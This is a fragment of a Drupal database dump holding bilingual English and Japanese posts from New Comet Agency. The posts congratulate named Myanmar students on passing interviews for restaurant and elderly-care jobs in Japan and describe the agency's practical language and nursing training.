data-entity-uuid=\"defb62ed-14d1-492c-ac75-b58d1404c12d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-d5dac7dda6d581cbc470feebbbd468d980c627d2a061f3651e8f19667e488377_60d78d918658494d.jpg\" data-entity-uuid=\"427ad047-f490-47dc-a8fb-c672cbaf09e0\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-de13510039a9d12d12a13345862bc0c6374a231d8abb6e9d7d62857e50efedab_b7d7f45f1ac532ed.jpg\" data-entity-uuid=\"85aa4ffd-37d9-46d2-8e35-3ae912d0e4b8\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-e3da82c6466cf309c553b6356c24dc7637df56327162829a054e8a1e76707da0_cbef71a7e5f47f26.jpg\" data-entity-uuid=\"25dc1e52-8259-40f7-8161-a809b26f9261\" data-entity-type=\"file\"></div></div></div><div class=\"mt-1 flex gap-3 empty:hidden juice:-ml-3\"><div class=\"-ml-1 mt-0 flex h-7 items-center justify-center gap-[2px] self-end text-gray-400 lg:justify-start lg:self-center visible\"><span class=\"\" data-state=\"closed\"><button class=\"rounded-md p-1 text-token-text-tertiary hover:text-token-text-primary\"><svg xmlns=\"http://www.w3.org/2000/svg\" width=\"24\" height=\"24\" fill=\"none\" viewBox=\"0 0 24 24\" class=\"icon-md-heavy\"><path fill=\"currentColor\" fill-rule=\"evenodd\" d=\"M7 5a3 3 0 0 1 3-3h9a3 3 0 0 1 3 3v9a3 3 0 0 1-3 3h-2v2a3 3 0 0 1-3 3H5a3 3 0 0 1-3-3v-9a3 3 0 0 1 3-3h2zm2 2h5a3 3 0 0 1 3 3v5h2a1 1 0 0 0 1-1V5a1 1 0 0 0-1-1h-9a1 1 0 0 0-1 1zM5 9a1 1 0 0 0-1 1v9a1 1 0 0 0 1 1h9a1 1 0 0 0 1-1v-9a1 1 0 0 0-1-1z\" clip-rule=\"evenodd\"></path></svg></button></span></div></div><div class=\"pr-2 lg:pr-0\">&nbsp;</div><div class=\"mt-3 w-full empty:hidden\"><div class=\"text-center\">&nbsp;</div></div></div><div class=\"absolute\"><span class=\"\" data-state=\"closed\"><button class=\"btn relative btn-secondary btn-small shadow-lg\"><div class=\"flex items-center justify-center\"><svg xmlns=\"http://www.w3.org/2000/svg\" width=\"24\" height=\"24\" fill=\"none\" viewBox=\"0 0 24 24\" class=\"icon-md\"><path fill=\"currentColor\" d=\"M7.5 13.25c.487 0 .95-.1 1.372-.28-.41 1.078-1.247 2.61-2.514 2.79a1 1 0 0 0 .283 1.98c2.553-.365 4.085-3.269 4.528-5.55.243-1.248.217-2.609-.32-3.743-.607-1.282-1.926-2.203-3.364-2.197a3.5 3.5 0 0 0 .015 7M16.18 13.25c.487 0 .95-.1 1.372-.28-.41 1.078-1.247 2.61-2.513 2.79a1 1 0 0 0 .282 1.98c2.553-.365 4.085-3.269 4.528-5.55.243-1.248.217-2.609-.32-3.743-.607-1.282-1.926-2.203-3.364-2.197a3.5 3.5 0 0 0 .015 7\"></path></svg></div></button></span></div></div></div></div></div></div></div></div></div></div><div class=\"w-full md:pt-0 dark:border-white/20 md:border-transparent md:dark:border-transparent md:w-[calc(100%-.5rem)] juice:w-full\"><div class=\"px-3 text-base md:px-4 m-auto md:px-5 lg:px-1 xl:px-5\"><div class=\"mx-auto flex flex-1 gap-3 text-base juice:gap-4 juice:md:gap-5 juice:lg:gap-6 md:max-w-3xl lg:max-w-[40rem] xl:max-w-[48rem]\"><form class=\"w-full\" type=\"button\" aria-haspopup=\"dialog\" aria-expanded=\"false\" aria-controls=\"radix-:r1:\" data-state=\"closed\"><div class=\"relative flex h-full max-w-full flex-1 flex-col\"><div class=\"absolute bottom-full left-0 right-0 z-20\"><div class=\"relative h-full w-full\"><div class=\"flex flex-col gap-3.5 pb-3.5 pt-2\"><div class=\"text-sm rounded-xl p-4 text-token-text-secondary flex items-center gap-3 fruit:rounded-2xl border border-token-border-light bg-token-main-surface-primary\">&nbsp;</div></div></div></div></div></form></div></div></div>', '', 'full_html'),
('activities', 0, 134, 567, 'en', 0, '<blockquote><h2>CONGRATULATIONS!&nbsp;</h2></blockquote><p>Congratulations to&nbsp;</p><ul><li>EI SHWE ZIN</li><li>THAE KO KO</li><li>EI KHIN</li><li>AUNG PYAE PAING</li><li>LWIN PHYO KO KO</li><li>HNIN EI PHYU</li><li>YU YU NYEIN&nbsp;</li></ul><p>for passing Interview for TOKUTEI GAISHOKU (Restaurant) to work at TOKYO City, JAPAN!!&nbsp;</p><p>&nbsp;</p><img data-entity-uuid=\"2bc479ec-e7ba-498e-8704-4530652df12e\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/EI%20SHWE%20ZIN_0.jpg\"><img data-entity-uuid=\"86bf19ac-1bbd-48da-9fc4-f3927dff557b\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/THAE%20KO%20KO.jpg\"><img data-entity-uuid=\"103515d9-16ed-4e9e-9e9a-67295929aab1\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/EI%20KHIN.jpg\"><img data-entity-uuid=\"ccf065ad-1962-4f2c-9ce3-dba25d06c3fc\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/AUNG%20PYAE%20PAING.jpg\"><img data-entity-uuid=\"dd9d7676-2373-40db-bba2-ab5daf943a46\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/LWIN%20PHYO%20KO%20KO_1.jpg\"><img data-entity-uuid=\"f2785092-a5e7-45c9-b78c-6534b7e2b419\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/HNIN%20EI%20PHYU_0.jpg\"><img data-entity-uuid=\"c033e30d-60d9-472a-a1c0-115701ac14e0\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/YU%20YU%20NYEIN_0.jpg\"><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 134, 567, 'ja', 0, '<blockquote><h2>おめでとうございます！</h2></blockquote><p>日本の東京市にある「特選外食」の面接に合格しました</p><p>さん</p><ul><li>EI SHWE ZIN さん,</li><li>THAE KO KO さん,</li><li>EI KHIN さん,</li><li>AUNG PYAE PAING さん,</li><li>LWIN PHYO KO KO さん,</li><li>HNIN EI PHYU さん,</li><li>YU YU NYEIN さん,</li></ul><p>、おめでとうございます!!</p><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/EI%20SHWE%20ZIN_0.jpg\" data-entity-uuid=\"2bc479ec-e7ba-498e-8704-4530652df12e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/THAE%20KO%20KO.jpg\" data-entity-uuid=\"86bf19ac-1bbd-48da-9fc4-f3927dff557b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/EI%20KHIN.jpg\" data-entity-uuid=\"103515d9-16ed-4e9e-9e9a-67295929aab1\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/AUNG%20PYAE%20PAING.jpg\" data-entity-uuid=\"ccf065ad-1962-4f2c-9ce3-dba25d06c3fc\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/LWIN%20PHYO%20KO%20KO_1.jpg\" data-entity-uuid=\"dd9d7676-2373-40db-bba2-ab5daf943a46\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/HNIN%20EI%20PHYU_0.jpg\" data-entity-uuid=\"f2785092-a5e7-45c9-b78c-6534b7e2b419\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/YU%20YU%20NYEIN_0.jpg\" data-entity-uuid=\"c033e30d-60d9-472a-a1c0-115701ac14e0\" data-entity-type=\"file\"><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 135, 569, 'en', 0, '<blockquote><h2>Purpose Of Pratical Training</h2></blockquote><div class=\"flex-1 overflow-hidden\"><div class=\"h-full\"><div class=\"react-scroll-to-bottom--css-swlfp-79elbk h-full\"><div class=\"react-scroll-to-bottom--css-swlfp-1n7m0yu\"><div class=\"flex flex-col text-sm md:pb-9\"><div class=\"w-full text-token-text-primary\" dir=\"auto\" data-testid=\"conversation-turn-5\" data-scroll-anchor=\"true\"><div class=\"py-2 juice:py-[18px] px-3 text-base md:px-4 m-auto md:px-5 lg:px-1 xl:px-5\"><div class=\"mx-auto flex flex-1 gap-3 text-base juice:gap-4 juice:md:gap-5 juice:lg:gap-6 md:max-w-3xl lg:max-w-[40rem] xl:max-w-[48rem]\"><div class=\"group/conversation-turn relative flex w-full min-w-0 flex-col agent-turn\"><div class=\"flex-col gap-1 md:gap-3\"><div class=\"flex flex-grow flex-col max-w-full\"><div class=\"min-h-[20px] text-message flex flex-col items-start whitespace-pre-wrap break-words [.text-message+&amp;]:mt-5 juice:w-full juice:items-end overflow-x-auto gap-3\" data-message-author-role=\"assistant\" data-message-id=\"f3c556c7-59b1-42a0-9643-f659a1bf9318\" dir=\"auto\"><div class=\"markdown prose w-full break-words dark:prose-invert light\"><p>At New Comet Agency, we are dedicated to delivering practical Japanese language education, ensuring that our students, upon passing restaurant interviews, can authentically engage without the need for pretense.Our experienced instructors facilitate learning through group activities and role-playing scenarios in kitchen settings, fostering practical skills among the children.It brings me great joy to witness the diligence and dedication shown by our students.Opportunities in the restaurant sector are currently available and actively seeking applicants.New Comet Agency strives to provide a supportive and seamless experience for our students. Thank you for placing your trust in New Comet Agency.</p><img data-entity-uuid=\"d461cd5e-81f8-4632-b976-098afb2f2d73\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-01-4c3297587b8913637c92ff50c2326e2f1021a9fcf056b7cb16d6ba29205df6a2_380971ba617052aa.jpg\"><img data-entity-uuid=\"9ab98bd6-5763-432d-8cdc-f211ec7cfe63\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-01-4d31ac152402a030c8ba31912543ea7a30250e000dab321739b6ba11ea001b42_b5bcd2939a1e8f15.jpg\"><img data-entity-uuid=\"98ce1e75-50bd-4f36-8438-9367b1cec93e\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-01-7b2fccd2b733e7a9acd3aaca56c06c0a44b8844b6b8c17e6fd30f8a55428e630_b33caf32547d7ead.jpg\"><img data-entity-uuid=\"dce2a94d-c506-4477-ba5c-10795478f04e\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-01-9e1fb5621c7e9a51b4ce4b236a1aecd884f5fc5f6260fee9ca019f5810da2b46_5093ee59ab653c67.jpg\"><img data-entity-uuid=\"ae0cc0b1-e07b-4ce9-b973-490e11905e7d\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-01-323e892e3b1dbb3bdcaca698554089023aba895aff3f2786a8af55a6c50c2556_240eccd80bef4f49.jpg\"><img data-entity-uuid=\"6c2ead23-f816-4744-8222-3953e9dc78b4\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-01-5520d7fa39d01c233b91f5709191efe5c0f10a38588f72d9b7dbc9b0e8f29b88_4bf2b681fc914170.jpg\"><img data-entity-uuid=\"2e112512-7618-4177-9887-8b386bec688d\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-01-98373069e88752acb3a3ce39562b0afc2adafa967f981a5561a45b55f0ae7d8d_da01565daa34c6c0.jpg\"><img data-entity-uuid=\"ca65e160-48f1-4987-bc32-8c183cd3f688\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-01-a28bd6a4223dab5056a4a96451178344954aa50db9f197e79916448a61b80b9f_71bb9f5b52350ed2.jpg\"><img data-entity-uuid=\"7def92f4-2793-4d57-84d8-3f641d7c91ff\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-01-ce1c8a821f40a67c1754a52f0495edaca6deafb497fd6b38ae4235b8b7b765f7_c28078628e919758.jpg\"></div></div></div><div class=\"mt-1 flex gap-3 empty:hidden juice:-ml-3\"><div class=\"-ml-1 mt-0 flex h-7 items-center justify-center gap-[2px] self-end text-gray-400 lg:justify-start lg:self-center visible\"><span class=\"\" data-state=\"closed\"><button class=\"rounded-md p-1 text-token-text-tertiary hover:text-token-text-primary\"><svg xmlns=\"http://www.w3.org/2000/svg\" width=\"24\" height=\"24\" fill=\"none\" viewBox=\"0 0 24 24\" class=\"icon-md-heavy\"><path fill=\"currentColor\" fill-rule=\"evenodd\" d=\"M7 5a3 3 0 0 1 3-3h9a3 3 0 0 1 3 3v9a3 3 0 0 1-3 3h-2v2a3 3 0 0 1-3 3H5a3 3 0 0 1-3-3v-9a3 3 0 0 1 3-3h2zm2 2h5a3 3 0 0 1 3 3v5h2a1 1 0 0 0 1-1V5a1 1 0 0 0-1-1h-9a1 1 0 0 0-1 1zM5 9a1 1 0 0 0-1 1v9a1 1 0 0 0 1 1h9a1 1 0 0 0 1-1v-9a1 1 0 0 0-1-1z\" clip-rule=\"evenodd\"></path></svg></button></span></div></div><div class=\"pr-2 lg:pr-0\">&nbsp;</div><div class=\"mt-3 w-full empty:hidden\"><div class=\"text-center\">&nbsp;</div></div></div><div class=\"absolute\"><span class=\"\" data-state=\"closed\"><button class=\"btn relative btn-secondary btn-small shadow-lg\"><div class=\"flex items-center justify-center\"><svg xmlns=\"http://www.w3.org/2000/svg\" width=\"24\" height=\"24\" fill=\"none\" viewBox=\"0 0 24 24\" class=\"icon-md\"><path fill=\"currentColor\" d=\"M7.5 13.25c.487 0 .95-.1 1.372-.28-.41 1.078-1.247 2.61-2.514 2.79a1 1 0 0 0 .283 1.98c2.553-.365 4.085-3.269 4.528-5.55.243-1.248.217-2.609-.32-3.743-.607-1.282-1.926-2.203-3.364-2.197a3.5 3.5 0 0 0 .015 7M16.18 13.25c.487 0 .95-.1 1.372-.28-.41 1.078-1.247 2.61-2.513 2.79a1 1 0 0 0 .282 1.98c2.553-.365 4.085-3.269 4.528-5.55.243-1.248.217-2.609-.32-3.743-.607-1.282-1.926-2.203-3.364-2.197a3.5 3.5 0 0 0 .015 7\"></path></svg></div></button></span></div></div></div></div></div></div></div></div></div></div><div class=\"w-full md:pt-0 dark:border-white/20 md:border-transparent md:dark:border-transparent md:w-[calc(100%-.5rem)] juice:w-full\"><div class=\"px-3 text-base md:px-4 m-auto md:px-5 lg:px-1 xl:px-5\"><div class=\"mx-auto flex flex-1 gap-3 text-base juice:gap-4 juice:md:gap-5 juice:lg:gap-6 md:max-w-3xl lg:max-w-[40rem] xl:max-w-[48rem]\"><form class=\"w-full\" type=\"button\" aria-haspopup=\"dialog\" aria-expanded=\"false\" aria-controls=\"radix-:r1:\" data-state=\"closed\"><div class=\"relative flex h-full max-w-full flex-1 flex-col\"><div class=\"absolute bottom-full left-0 right-0 z-20\">&nbsp;</div><div class=\"flex w-full items-center\"><div class=\"overflow-hidden [&amp;:has(textarea:focus)]:border-token-border-xheavy [&amp;:has(textarea:focus)]:shadow-[0_2px_6px_rgba(0,0,0,.05)] flex flex-col w-full flex-grow relative border dark:text-white rounded-2xl bg-token-main-surface-primary border-token-border-medium\">&nbsp;</div></div></div></form></div></div></div>', '', 'full_html');
INSERT INTO `node__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('activities', 0, 135, 569, 'ja', 0, '<div class=\"flex-1 overflow-hidden\"><div class=\"h-full\"><div class=\"react-scroll-to-bottom--css-swlfp-79elbk h-full\"><div class=\"react-scroll-to-bottom--css-swlfp-1n7m0yu\"><div class=\"flex flex-col text-sm md:pb-9\"><div class=\"w-full text-token-text-primary\" dir=\"auto\" data-testid=\"conversation-turn-5\" data-scroll-anchor=\"true\"><div class=\"py-2 juice:py-[18px] px-3 text-base md:px-4 m-auto md:px-5 lg:px-1 xl:px-5\"><div class=\"mx-auto flex flex-1 gap-3 text-base juice:gap-4 juice:md:gap-5 juice:lg:gap-6 md:max-w-3xl lg:max-w-[40rem] xl:max-w-[48rem]\"><div class=\"group/conversation-turn relative flex w-full min-w-0 flex-col agent-turn\"><div class=\"flex-col gap-1 md:gap-3\"><div class=\"flex flex-grow flex-col max-w-full\"><div class=\"min-h-[20px] text-message flex flex-col items-start whitespace-pre-wrap break-words [.text-message+&amp;]:mt-5 juice:w-full juice:items-end overflow-x-auto gap-3\" data-message-author-role=\"assistant\" data-message-id=\"f3c556c7-59b1-42a0-9643-f659a1bf9318\" dir=\"auto\"><div class=\"markdown prose w-full break-words dark:prose-invert light\"><blockquote><h2>実習の目的</h2></blockquote><p>ニューコメットエージェンシーでは、実用的な日本語教育を提供することに注力しており、レストランの面接に合格した生徒が、見せかけの必要もなく、本気で取り組めるようにしています。経験豊富なインストラクターが、グループ活動やキッチンでのロールプレイングのシナリオを通して学習を促進し、子供たちに実践的なスキルを育みます。生徒の勤勉さと献身を目の当たりにするのは、私にとって大きな喜びです。現在、レストラン部門での機会があり、積極的に応募者を募集しています。ニューコメットエージェンシーは、生徒にサポート的でシームレスな体験を提供することを目指しています。ニューコメットエージェンシーを信頼していただき、ありがとうございます。</p><img src=\"/sites/default/files/inline-images/0-02-01-4c3297587b8913637c92ff50c2326e2f1021a9fcf056b7cb16d6ba29205df6a2_380971ba617052aa.jpg\" data-entity-uuid=\"d461cd5e-81f8-4632-b976-098afb2f2d73\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-4d31ac152402a030c8ba31912543ea7a30250e000dab321739b6ba11ea001b42_b5bcd2939a1e8f15.jpg\" data-entity-uuid=\"9ab98bd6-5763-432d-8cdc-f211ec7cfe63\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-7b2fccd2b733e7a9acd3aaca56c06c0a44b8844b6b8c17e6fd30f8a55428e630_b33caf32547d7ead.jpg\" data-entity-uuid=\"98ce1e75-50bd-4f36-8438-9367b1cec93e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-9e1fb5621c7e9a51b4ce4b236a1aecd884f5fc5f6260fee9ca019f5810da2b46_5093ee59ab653c67.jpg\" data-entity-uuid=\"dce2a94d-c506-4477-ba5c-10795478f04e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-323e892e3b1dbb3bdcaca698554089023aba895aff3f2786a8af55a6c50c2556_240eccd80bef4f49.jpg\" data-entity-uuid=\"ae0cc0b1-e07b-4ce9-b973-490e11905e7d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-5520d7fa39d01c233b91f5709191efe5c0f10a38588f72d9b7dbc9b0e8f29b88_4bf2b681fc914170.jpg\" data-entity-uuid=\"6c2ead23-f816-4744-8222-3953e9dc78b4\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-98373069e88752acb3a3ce39562b0afc2adafa967f981a5561a45b55f0ae7d8d_da01565daa34c6c0.jpg\" data-entity-uuid=\"2e112512-7618-4177-9887-8b386bec688d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-a28bd6a4223dab5056a4a96451178344954aa50db9f197e79916448a61b80b9f_71bb9f5b52350ed2.jpg\" data-entity-uuid=\"ca65e160-48f1-4987-bc32-8c183cd3f688\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-ce1c8a821f40a67c1754a52f0495edaca6deafb497fd6b38ae4235b8b7b765f7_c28078628e919758.jpg\" data-entity-uuid=\"7def92f4-2793-4d57-84d8-3f641d7c91ff\" data-entity-type=\"file\"></div></div></div><div class=\"mt-1 flex gap-3 empty:hidden juice:-ml-3\"><div class=\"-ml-1 mt-0 flex h-7 items-center justify-center gap-[2px] self-end text-gray-400 lg:justify-start lg:self-center visible\"><span class=\"\" data-state=\"closed\"><button class=\"rounded-md p-1 text-token-text-tertiary hover:text-token-text-primary\"><svg xmlns=\"http://www.w3.org/2000/svg\" width=\"24\" height=\"24\" fill=\"none\" viewBox=\"0 0 24 24\" class=\"icon-md-heavy\"><path fill=\"currentColor\" fill-rule=\"evenodd\" d=\"M7 5a3 3 0 0 1 3-3h9a3 3 0 0 1 3 3v9a3 3 0 0 1-3 3h-2v2a3 3 0 0 1-3 3H5a3 3 0 0 1-3-3v-9a3 3 0 0 1 3-3h2zm2 2h5a3 3 0 0 1 3 3v5h2a1 1 0 0 0 1-1V5a1 1 0 0 0-1-1h-9a1 1 0 0 0-1 1zM5 9a1 1 0 0 0-1 1v9a1 1 0 0 0 1 1h9a1 1 0 0 0 1-1v-9a1 1 0 0 0-1-1z\" clip-rule=\"evenodd\"></path></svg></button></span></div></div><div class=\"pr-2 lg:pr-0\">&nbsp;</div><div class=\"mt-3 w-full empty:hidden\"><div class=\"text-center\">&nbsp;</div></div></div><div class=\"absolute\"><span class=\"\" data-state=\"closed\"><button class=\"btn relative btn-secondary btn-small shadow-lg\"><div class=\"flex items-center justify-center\"><svg xmlns=\"http://www.w3.org/2000/svg\" width=\"24\" height=\"24\" fill=\"none\" viewBox=\"0 0 24 24\" class=\"icon-md\"><path fill=\"currentColor\" d=\"M7.5 13.25c.487 0 .95-.1 1.372-.28-.41 1.078-1.247 2.61-2.514 2.79a1 1 0 0 0 .283 1.98c2.553-.365 4.085-3.269 4.528-5.55.243-1.248.217-2.609-.32-3.743-.607-1.282-1.926-2.203-3.364-2.197a3.5 3.5 0 0 0 .015 7M16.18 13.25c.487 0 .95-.1 1.372-.28-.41 1.078-1.247 2.61-2.513 2.79a1 1 0 0 0 .282 1.98c2.553-.365 4.085-3.269 4.528-5.55.243-1.248.217-2.609-.32-3.743-.607-1.282-1.926-2.203-3.364-2.197a3.5 3.5 0 0 0 .015 7\"></path></svg></div></button></span></div></div></div></div></div></div></div></div></div></div><div class=\"w-full md:pt-0 dark:border-white/20 md:border-transparent md:dark:border-transparent md:w-[calc(100%-.5rem)] juice:w-full\"><div class=\"px-3 text-base md:px-4 m-auto md:px-5 lg:px-1 xl:px-5\"><div class=\"mx-auto flex flex-1 gap-3 text-base juice:gap-4 juice:md:gap-5 juice:lg:gap-6 md:max-w-3xl lg:max-w-[40rem] xl:max-w-[48rem]\"><form class=\"w-full\" type=\"button\" aria-haspopup=\"dialog\" aria-expanded=\"false\" aria-controls=\"radix-:r1:\" data-state=\"closed\"><div class=\"relative flex h-full max-w-full flex-1 flex-col\"><div class=\"absolute bottom-full left-0 right-0 z-20\">&nbsp;</div><div class=\"flex w-full items-center\"><div class=\"overflow-hidden [&amp;:has(textarea:focus)]:border-token-border-xheavy [&amp;:has(textarea:focus)]:shadow-[0_2px_6px_rgba(0,0,0,.05)] flex flex-col w-full flex-grow relative border dark:text-white rounded-2xl bg-token-main-surface-primary border-token-border-medium\">&nbsp;</div></div></div></form></div></div></div>', '', 'full_html'),
('activities', 0, 136, 571, 'en', 0, '<blockquote><h2>Pratical Nursing Class</h2></blockquote><p>At New Comet Agency, we provide comprehensive training not only for students who have successfully passed restaurant interviews but also for those who have passed Kaigo interviews. Our approach ensures that all students, guided by both native-speaking and experienced instructors, gain practical experience to thrive in their respective workplaces without encountering difficulties.Upon completing the course, students undergo practical training at elderly care centers, where they acquire invaluable workplace experience. With instruction from native-speaking teachers, our students gain confidence in Japanese language proficiency, eliminating any potential challenges. New Comet Agency is committed to facilitating these arrangements for our students\' success.</p><img src=\"/sites/default/files/inline-images/0-02-01-8ef5e64f31d9615be92bd0062cb573b06ee4bee9789cbe58d0f127033a97175e_6f23e588bd15393e.jpg\" data-entity-uuid=\"eed24d54-c86c-416b-98f7-09dea845ac1c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-09e7d07cc2ecc4a33fdb2f8f617a02333246cdf67ac391d823e3fd50027af130_b18fd9e88b2b2edd.jpg\" data-entity-uuid=\"37414a98-8104-454b-b331-19bcbe023fcf\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-92f9bd40908c232e37f43e2325a73908f1735f37074c401c18d502f3cced7655_ab037e0fc22ee60f.jpg\" data-entity-uuid=\"e4cc71ad-759c-42b4-badd-66e931638690\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-365bbd1dfc22640a05b723c606ec9efef65bfb227024834ee841ef15f43fdfac_6c86b8d1b645de64.jpg\" data-entity-uuid=\"625a7ae1-0d02-42dc-bdfe-4e20ab2c9149\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-802c3591cb73b236e3fbe0ccefffffa6c191429453a6aa0ae62c5f31fc55ce0d_5bd9c7a49dd2a4ce.jpg\" data-entity-uuid=\"54621e25-04ce-406d-b67e-f85a318f30d6\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-a96a827d143694f86f612460909a06bacd3ae0ebac5eb6ac6f9db603323a2a5a_32c913cf07297e81.jpg\" data-entity-uuid=\"ec2abf47-c859-4a6f-89de-fff4bd70d39e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-b72d45b080bf0a2772e499b2d107f2cf257ea99199ef0130841d7b4018c7950a_cb0f1c5055b5693c.jpg\" data-entity-uuid=\"e21aefc0-db24-4dd7-a5b3-5bc66d146b51\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-f4bc37fab26942147926f868f6cc298d4e073ff11095ebc1d6afa653cd365c3e_a1637f152c67c3f0.jpg\" data-entity-uuid=\"fd78dfb2-013a-4c12-ab48-e8b0d08df4f9\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 136, 571, 'ja', 0, '<blockquote><h2>実習看護クラス</h2><p>ニューコメットエージェンシーでは、レストランの面接に合格した学生だけでなく、介護の面接に合格した学生にも包括的なトレーニングを提供しています。私たちのアプローチでは、ネイティブスピーカーと経験豊富なインストラクターの両方の指導により、すべての学生がそれぞれの職場で困難に遭遇することなく活躍するための実践的な経験を積むことを保証します。コース修了後、学生は高齢者介護施設で実習を受け、貴重な職場経験を積むことができます。ネイティブスピーカーの教師の指導により、学生は日本語能力に自信を持ち、潜在的な問題を排除します。ニューコメットエージェンシーは、学生の成功のためにこれらの手配を促進することに尽力しています。</p></blockquote><img src=\"/sites/default/files/inline-images/0-02-01-8ef5e64f31d9615be92bd0062cb573b06ee4bee9789cbe58d0f127033a97175e_6f23e588bd15393e.jpg\" data-entity-uuid=\"eed24d54-c86c-416b-98f7-09dea845ac1c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-09e7d07cc2ecc4a33fdb2f8f617a02333246cdf67ac391d823e3fd50027af130_b18fd9e88b2b2edd.jpg\" data-entity-uuid=\"37414a98-8104-454b-b331-19bcbe023fcf\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-92f9bd40908c232e37f43e2325a73908f1735f37074c401c18d502f3cced7655_ab037e0fc22ee60f.jpg\" data-entity-uuid=\"e4cc71ad-759c-42b4-badd-66e931638690\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-365bbd1dfc22640a05b723c606ec9efef65bfb227024834ee841ef15f43fdfac_6c86b8d1b645de64.jpg\" data-entity-uuid=\"625a7ae1-0d02-42dc-bdfe-4e20ab2c9149\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-802c3591cb73b236e3fbe0ccefffffa6c191429453a6aa0ae62c5f31fc55ce0d_5bd9c7a49dd2a4ce.jpg\" data-entity-uuid=\"54621e25-04ce-406d-b67e-f85a318f30d6\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-a96a827d143694f86f612460909a06bacd3ae0ebac5eb6ac6f9db603323a2a5a_32c913cf07297e81.jpg\" data-entity-uuid=\"ec2abf47-c859-4a6f-89de-fff4bd70d39e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-b72d45b080bf0a2772e499b2d107f2cf257ea99199ef0130841d7b4018c7950a_cb0f1c5055b5693c.jpg\" data-entity-uuid=\"e21aefc0-db24-4dd7-a5b3-5bc66d146b51\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-f4bc37fab26942147926f868f6cc298d4e073ff11095ebc1d6afa653cd365c3e_a1637f152c67c3f0.jpg\" data-entity-uuid=\"fd78dfb2-013a-4c12-ab48-e8b0d08df4f9\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 137, 573, 'en', 0, '<blockquote><h2>CONGRATULATIONS!&nbsp;</h2></blockquote><p>Congratulations to&nbsp;</p><ul><li>NANG BWAR KYI</li><li>PHRAY MYAR</li><li>KAW MYAR</li></ul><p>For passing the Interview for TOKUTEI KAIGO to work at AKITA Prefecture , JAPAN!&nbsp;</p><img data-entity-uuid=\"7f53d639-b584-4ee0-b277-c440cdca648c\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/KAW%20MYAR_0.jpg\"><img data-entity-uuid=\"c03f9127-c9cd-4498-a15f-ca1164aae27e\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NAN%20BWAR%20KYI_0.jpg\"><img data-entity-uuid=\"6631104e-9fd6-45e0-b354-c85cb8a506d3\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/PHRAY%20MYAR.jpg\">', '', 'full_html'),
